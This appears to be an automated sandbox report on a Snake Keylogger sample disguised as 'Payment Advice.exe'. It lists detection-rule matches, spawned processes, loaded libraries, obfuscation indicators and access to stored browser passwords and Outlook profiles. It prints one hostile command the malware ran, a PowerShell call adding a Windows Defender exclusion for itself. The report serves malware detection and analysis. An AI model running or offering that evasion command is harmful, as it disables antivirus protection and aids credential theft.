Source: Payment Advice.exe, 00000005.00000002.2994910866.000000000041A000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCloudServices.exe< vs Payment Advice.exe
Source: Payment Advice.exe, 00000005.00000002.2995068041.00000000012F7000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Payment Advice.exe
Source: Payment Advice.exe | Binary or memory string: OriginalFilenameiAbl.exe0 vs Payment Advice.exe
Source: Payment Advice.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Note: the submitted file's own version info names it iAbl.exe (consistent with the iAbl.pdb path above), whereas the image mapped at 0x400000 in the later Payment Advice.exe instance (process index 5) carries OriginalFilename CloudServices.exe. The injected payload is therefore a different PE from the outer dropper, and CloudServices.exe, Montero.dll and TL.dll are the in-memory names to pivot on.
                  Source: 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: Payment Advice.exe PID: 2708, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: Payment Advice.exe PID: 5216, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Payment Advice.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.Payment Advice.exe.3e343a8.5.raw.unpack, UltraSpeed.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Payment Advice.exe.3e343a8.5.raw.unpack, COVIDPickers.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Payment Advice.exe.3db1398.2.raw.unpack, UltraSpeed.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Payment Advice.exe.3db1398.2.raw.unpack, COVIDPickers.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, wnc5bH9fX7sv7Za8LK.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, wnc5bH9fX7sv7Za8LK.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, wnc5bH9fX7sv7Za8LK.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, wnc5bH9fX7sv7Za8LK.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, wnc5bH9fX7sv7Za8LK.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, wnc5bH9fX7sv7Za8LK.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, V0od1GpONNlKZ74lAd.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, V0od1GpONNlKZ74lAd.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, V0od1GpONNlKZ74lAd.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, V0od1GpONNlKZ74lAd.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, wnc5bH9fX7sv7Za8LK.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, wnc5bH9fX7sv7Za8LK.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, wnc5bH9fX7sv7Za8LK.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, V0od1GpONNlKZ74lAd.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, V0od1GpONNlKZ74lAd.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@8/6@2/2
                  Source: C:\Users\user\Desktop\Payment Advice.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment Advice.exe.log
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Mutant created: NULL
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1720:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zjtn34di.qcx.ps1
                  Source: Payment Advice.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: Payment Advice.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\Payment Advice.exe | File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: Payment Advice.exe, 00000005.00000002.2996681350.00000000034EE000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000005.00000002.2996681350.00000000034DE000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000005.00000002.2996681350.00000000034FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: Payment Advice.exe | Virustotal: Detection: 34%
                  Source: unknown | Process created: C:\Users\user\Desktop\Payment Advice.exe "C:\Users\user\Desktop\Payment Advice.exe"
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe"
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Process created: C:\Users\user\Desktop\Payment Advice.exe "C:\Users\user\Desktop\Payment Advice.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Process created: C:\Users\user\Desktop\Payment Advice.exe "C:\Users\user\Desktop\Payment Advice.exe"
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe"
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Process created: C:\Users\user\Desktop\Payment Advice.exe "C:\Users\user\Desktop\Payment Advice.exe"
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Process created: C:\Users\user\Desktop\Payment Advice.exe "C:\Users\user\Desktop\Payment Advice.exe"
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: mscoree.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: version.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: profapi.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: dwrite.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: windowscodecs.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: userenv.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: msasn1.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: gpapi.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: textshaping.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: propsys.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: edputil.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: urlmon.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: iertutil.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: srvcli.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: netutils.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: sspicli.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: appresolver.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: bcp47langs.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: slc.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: sppc.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: mscoree.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: version.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: profapi.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: rasapi32.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: rasman.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: rtutils.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: mswsock.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: winhttp.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: iphlpapi.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: dhcpcsvc.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: dnsapi.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: winnsi.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: rasadhlp.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: fwpuclnt.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: secur32.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: sspicli.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: schannel.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: mskeyprotect.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: ntasn1.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: ncrypt.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: ncryptsslp.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: msasn1.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: gpapi.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Section loaded: dpapi.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                  Source: Window Recorder | Window detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\Payment Advice.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Payment Advice.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Payment Advice.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Payment Advice.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: iAbl.pdbSHA256j~^ source: Payment Advice.exe
                  Source: Binary string: iAbl.pdb source: Payment Advice.exe

                  Data Obfuscation

                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, wnc5bH9fX7sv7Za8LK.cs | .Net Code: bAAWV5gLEV System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Payment Advice.exe.2eddbfc.0.raw.unpack, .cs | .Net Code: System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, wnc5bH9fX7sv7Za8LK.cs | .Net Code: bAAWV5gLEV System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, wnc5bH9fX7sv7Za8LK.cs | .Net Code: bAAWV5gLEV System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Payment Advice.exe.5f90000.6.raw.unpack, .cs | .Net Code: System.Reflection.Assembly.Load(byte[])
                  Source: Payment Advice.exe | Static PE information: 0xD22D0139 [Sat Sep 27 02:13:13 2081 UTC]
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Code function: 0_2_0796DE05 push FFFFFF8Bh; iretd 0_2_0796DE07
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Code function: 0_2_0796DCEF push dword ptr [ebx+ebp-75h]; iretd 0_2_0796DD15
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Code function: 0_2_07968A64 pushfd ; ret 0_2_07968A65
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Code function: 5_2_0187F273 push ebp; retf 5_2_0187F281
                  Source: Payment Advice.exe | Static PE information: section name: .text entropy: 7.6054071879897105
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, u24XxM8uRIoTpav9E2.csHigh entropy of concatenated method names: 'Ios4oGXpVE', 'JaS43scBeL', 'TBt4IZVdnL', 'Nnk4EH0nCN', 'u77xs4dgjMve3awyxvI', 'O3tkUMdP1ohbgdHMHYI', 'nJx62sdojb8rgr5eyNK', 'QBh6ypdfVqfP5J2x7Rr'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, V0od1GpONNlKZ74lAd.csHigh entropy of concatenated method names: 'oS3tLhb6ui', 'wnSt81ZogZ', 'niytc7xIW5', 'PkZt5RaBEy', 'pW7tA9Ks8u', 'r5OtOeiP7L', 'i67toF6ibk', 'VhVt3sAdi3', 'lp2tI0WnR1', 'r4ltEeq9p8'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, cLBVf8vxft4stwplCk.csHigh entropy of concatenated method names: 'uElDYUnniX', 'qogD1XJsBH', 'tioDVn8w2Y', 'FH4D2lL56N', 'JJqDBE6415', 't9YDlYQY0r', 'FJTDb9UAn3', 'CVHDpbkaFi', 'JBVDqG6yfg', 'CjYDdZpFKD'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, V1TjnGssHvunMsGa5Eb.csHigh entropy of concatenated method names: 'F76iEa8fgP', 'ceFizyETVh', 'A3RMwjioeJ', 'YwyMsUdBrI', 'sF0MgwYuOY', 'YQUMKETxmp', 'Xb9MWXh4Hh', 'pHwMTEuCc3', 'lFRMuSQhnO', 'BmMMtN1dst'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, Tmqavsg8mMuu42rPYF.csHigh entropy of concatenated method names: 'gBEVYjiLK', 'vDp21M1HV', 'PPll7Bbmq', 'sfGbUrCKj', 'nw5qNo1PP', 'FE8dG5wEe', 'qikmx7lMJdk2CscBwb', 'DcWTOK2vGElA0VANfu', 'C2djIZ4UW', 'Nu4irNR9L'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, e0GJdvoX7FLALSqXBB.csHigh entropy of concatenated method names: 'Dd9G4GrfyS', 'N1QGUR1VYv', 'VEbGGPruDn', 'qSCGMqqJoK', 'jOFGPSBcJ7', 'HyvGrEnRVI', 'Dispose', 'VFtjuhdk7F', 'm37jtMfqL6', 'YDyj7SNKlk'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, D7kjX5E8wnBR9dmFol.csHigh entropy of concatenated method names: 'vRBi7GLes8', 'tCPiFW8OMc', 'aeuiyIphdE', 'FhOiDjfv2O', 'gmQiGTJa1Z', 'iDDi9Wkdwk', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, mLmW3OCpnpqE18nJXc.csHigh entropy of concatenated method names: 'TdlXpRo1yS', 'LKnXqqTky2', 'fmMXhJjOi7', 'xekXedIG9D', 'xahXnZt4yI', 'zp9XQ7URUX', 'J2UXxc0chi', 'yALXNNAHme', 'DVAXSfVHR9', 'CbpXmZN84s'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, D9fIhtzgI70fuFLfL8.csHigh entropy of concatenated method names: 'UJ4ilxbfNo', 'v6YipWwTKI', 'dIqiqGfbf5', 'IvMihj75aU', 'W1Bie6rgXs', 'HmSin84mgV', 'f9AiQxweq4', 'vIVirkAcEW', 'aijiYE8CSP', 'AWvi1XRxQR'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, JqfdkMd0ddEo7nCNGc.csHigh entropy of concatenated method names: 'ReLFBZWsIW', 'kjNFbN0ZCu', 'tRK76TZni3', 'Ifs7nVV66h', 'r4G7QGvEvO', 'HjA7HUKq2H', 'TAa7xeXT8Z', 'RZR7N4ud5F', 'yaR7vlAPDT', 'F117SIj26y'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, Xcvjh2qGxiEDr0S8vo.csHigh entropy of concatenated method names: 'IUW72xd9Uj', 'ivM7lRxutY', 'CZh7ph1X4N', 'i6f7qAiFxv', 'vnQ746FYok', 'Q0f7f8wLRh', 'lFX7U5fsXr', 'kKX7jpNWnQ', 'hcG7GvbnWa', 'Mft7i9ZnF9'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, oWqsALsW1iwXN1h3kju.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HluZG81wAQ', 'JfZZi2UUTl', 'JLdZMxFH25', 'ma7ZZKOKso', 'OeqZPp96Is', 'PsgZ0JNqOQ', 'gWvZrPjGiW'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, DxAo2jOv4eQMN8950u.csHigh entropy of concatenated method names: 'LvEU3jvRfy', 'I9SUEXdxYO', 'QVajwrf9Un', 'EDkjsEQR77', 't4mUmPLAiL', 'nKjURPxkPk', 'jcoUCZ2SPU', 'S5tULm2Dmn', 'Q8nU8kiD3s', 'bD0UcpPVCI'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, cHCrHP7pHPpQHmwNll.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Q6egI7qio2', 'DDOgEujtMV', 'f3IgzkK6LJ', 'hSMKw0hvRj', 'kMuKsuc6xh', 'd9XKgevibc', 'pcvKKLLZrA', 'y4SL4pNJUfERROE0Eso'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, c7HHP8tld33bUMM6HI.cs - High entropy of concatenated method names: 'Dispose', 'iLAsILSqXB', 'b51gepU8RB', 'cJu7pLcNv6', 'AiBsEu7P8r', 'f4MszrhBZd', 'ProcessDialogKey', 'tungwH4ota', 'WRlgsJOKv3', 'VO2ggb7kjX'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, IH4otaIoRlJOKv3OO2.cs - High entropy of concatenated method names: 'bqbGhCxYpb', 'R9VGeyFgsu', 'FDJG63dPBj', 'DZ7Gn35pUt', 'ByOGQ8X2Zk', 'nOnGHuKcsh', 'mo9Gx6X1FD', 'IuaGNdvpc8', 'KoXGvOawAf', 'LJ8GSpjOSv'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, LRRNOAswi6QDbTcFmFG.cs - High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'C2xim88VxS', 'ysaiRk0X2d', 'yPxiCoZss2', 'lHEiLXgVUW', 'K4Pi8GHaj2', 'MuZick8hyl', 'nV6i5FV1JX'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, UwINc6WPeWx2cQLcGX.cs - High entropy of concatenated method names: 'dMosD0od1G', 'VNNs9lKZ74', 'AGxskiEDr0', 'N8vsJoQqfd', 'ICNs4Gclkn', 'yMQsfr7NFD', 'QvbD4e3XQGZ0dY5MS2', 'MCiZxFHodbeJNdcgrb', 'ROqssdWaPj', 'IWbsKfgnL9'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, PlaOlGx5mN833C3ruy.cs - High entropy of concatenated method names: 'uMDDuLugr7', 'NJqD7lgHvf', 'rVJDyxEtS8', 'uRtyEwoDOC', 'wj5yzo1nXP', 'zO8Dwpgsu3', 'sMeDsLTTD5', 'H6sDgsVx9q', 'ck0DKq40dS', 'kBiDWOVwWb'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, nXdkee5FZdtlC42u5A.cs - High entropy of concatenated method names: 'EcvUk3ICZA', 'AbkUJ4vcr5', 'ToString', 'zI7UuslB3N', 'oJAUtRQYLC', 'GFlU7Decus', 'UU7UFIw4Gr', 'TWFUyUQRwC', 'mMjUDXDZb7', 'PR9U9NVo96'
